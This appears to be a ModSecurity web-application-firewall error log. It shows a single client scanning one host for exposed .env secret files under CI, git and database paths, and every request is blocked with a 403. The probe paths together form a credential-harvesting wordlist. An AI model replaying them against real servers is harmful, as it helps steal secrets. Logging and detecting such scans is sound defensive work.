[Mon May 11 18:07:41.144509 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.git/.env"] [unique_id "agH-zQ-Qm4vhlWBPlMjebQAAAAo"]
[Mon May 11 18:07:41.144895 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.git/.env"] [unique_id "agH-zQ-Qm4vhlWBPlMjebQAAAAo"]
[Mon May 11 18:07:41.145490 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-zQ-Qm4vhlWBPlMjebQAAAAo"]
[Mon May 11 18:07:41.475650 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/ci/.env"] [unique_id "agH-zQ-Qm4vhlWBPlMjebgAAAAo"]
[Mon May 11 18:07:41.475883 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/ci/.env"] [unique_id "agH-zQ-Qm4vhlWBPlMjebgAAAAo"]
[Mon May 11 18:07:41.476174 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-zQ-Qm4vhlWBPlMjebgAAAAo"]
[Mon May 11 18:07:41.864014 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cd/.env"] [unique_id "agH-zQ-Qm4vhlWBPlMjebwAAAAo"]
[Mon May 11 18:07:41.864252 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cd/.env"] [unique_id "agH-zQ-Qm4vhlWBPlMjebwAAAAo"]
[Mon May 11 18:07:41.864573 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-zQ-Qm4vhlWBPlMjebwAAAAo"]
[Mon May 11 18:07:42.300275 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/jenkins/.env"] [unique_id "agH-zg-Qm4vhlWBPlMjecgAAAAo"]
[Mon May 11 18:07:42.300460 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/jenkins/.env"] [unique_id "agH-zg-Qm4vhlWBPlMjecgAAAAo"]
[Mon May 11 18:07:42.300724 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-zg-Qm4vhlWBPlMjecgAAAAo"]
[Mon May 11 18:07:43.311628 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/gitlab/.env"] [unique_id "agH-zw-Qm4vhlWBPlMjedAAAAAE"]
[Mon May 11 18:07:43.312150 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/gitlab/.env"] [unique_id "agH-zw-Qm4vhlWBPlMjedAAAAAE"]
[Mon May 11 18:07:43.314112 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-zw-Qm4vhlWBPlMjedAAAAAE"]
[Mon May 11 18:07:43.586883 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/github/.env"] [unique_id "agH-zw-Qm4vhlWBPlMjedQAAAAE"]
[Mon May 11 18:07:43.587139 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/github/.env"] [unique_id "agH-zw-Qm4vhlWBPlMjedQAAAAE"]
[Mon May 11 18:07:43.587801 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-zw-Qm4vhlWBPlMjedQAAAAE"]
[Mon May 11 18:07:43.888845 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/actions/.env"] [unique_id "agH-zw-Qm4vhlWBPlMjedgAAAAE"]
[Mon May 11 18:07:43.889088 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/actions/.env"] [unique_id "agH-zw-Qm4vhlWBPlMjedgAAAAE"]
[Mon May 11 18:07:43.889409 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-zw-Qm4vhlWBPlMjedgAAAAE"]
[Mon May 11 18:07:44.161113 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/circleci/.env"] [unique_id "agH-0A-Qm4vhlWBPlMjedwAAAAE"]
[Mon May 11 18:07:44.161362 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/circleci/.env"] [unique_id "agH-0A-Qm4vhlWBPlMjedwAAAAE"]
[Mon May 11 18:07:44.161664 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0A-Qm4vhlWBPlMjedwAAAAE"]
[Mon May 11 18:07:44.418587 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/travis/.env"] [unique_id "agH-0A-Qm4vhlWBPlMjeeQAAAAE"]
[Mon May 11 18:07:44.418824 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/travis/.env"] [unique_id "agH-0A-Qm4vhlWBPlMjeeQAAAAE"]
[Mon May 11 18:07:44.419117 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0A-Qm4vhlWBPlMjeeQAAAAE"]
[Mon May 11 18:07:44.705636 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/buildkite/.env"] [unique_id "agH-0A-Qm4vhlWBPlMjeegAAAAE"]
[Mon May 11 18:07:44.705838 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/buildkite/.env"] [unique_id "agH-0A-Qm4vhlWBPlMjeegAAAAE"]
[Mon May 11 18:07:44.706112 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0A-Qm4vhlWBPlMjeegAAAAE"]
[Mon May 11 18:07:44.939150 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mysql/.env"] [unique_id "agH-0A-Qm4vhlWBPlMjeewAAAAE"]
[Mon May 11 18:07:44.939527 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mysql/.env"] [unique_id "agH-0A-Qm4vhlWBPlMjeewAAAAE"]
[Mon May 11 18:07:44.939933 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0A-Qm4vhlWBPlMjeewAAAAE"]
[Mon May 11 18:07:45.225723 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/postgres/.env"] [unique_id "agH-0Q-Qm4vhlWBPlMjefQAAAAE"]
[Mon May 11 18:07:45.225931 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/postgres/.env"] [unique_id "agH-0Q-Qm4vhlWBPlMjefQAAAAE"]
[Mon May 11 18:07:45.226230 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0Q-Qm4vhlWBPlMjefQAAAAE"]
[Mon May 11 18:07:45.756785 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/mongodb/.env"] [unique_id "agH-0Q-Qm4vhlWBPlMjefwAAAAE"]
[Mon May 11 18:07:45.756967 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/mongodb/.env"] [unique_id "agH-0Q-Qm4vhlWBPlMjefwAAAAE"]
[Mon May 11 18:07:45.757256 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0Q-Qm4vhlWBPlMjefwAAAAE"]
[Mon May 11 18:07:46.013774 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/redis/.env"] [unique_id "agH-0g-Qm4vhlWBPlMjegAAAAAE"]
